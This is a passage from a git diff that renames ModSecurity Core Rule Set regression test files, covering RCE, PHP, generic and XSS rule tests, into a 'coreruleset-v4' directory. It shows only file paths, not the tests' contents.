src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml 